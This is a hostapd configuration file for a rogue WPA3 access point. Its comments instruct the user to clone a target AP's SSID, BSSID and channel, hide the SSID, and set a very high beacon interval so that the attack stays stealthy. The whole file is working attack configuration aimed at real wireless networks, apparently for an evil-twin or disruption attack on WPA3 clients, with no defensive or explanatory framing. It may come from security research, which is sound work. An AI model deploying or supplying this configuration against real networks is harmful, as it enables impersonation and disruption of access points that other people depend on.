interface=wlan1 #Change to wireless interface used on attack node
ssid=WPA3 #Change to SSID of target AP

beacon_int=9999 #Setting to high value so attack is steathly
bssid=30:86:2D:C0:07:C0 #Change value to BSSID of target AP
ignore_broadcast_ssid=1
macaddr_acl=0

hw_mode=g
channel=1 #Change to channel on which target AP is running

wpa=2 #Setting WPA3 security for our attack AP
wpa_passphrase=iitbombayx #Setting passphrase of our AP. Can be changed to any value, doesn't matter
wpa_key_mgmt=SAE #Setting SAE security for our attack AP
rsn_pairwise=CCMP #Setting CCMP pariwise encryption
ieee80211w=2 #Setting MFP requirement to compulsory
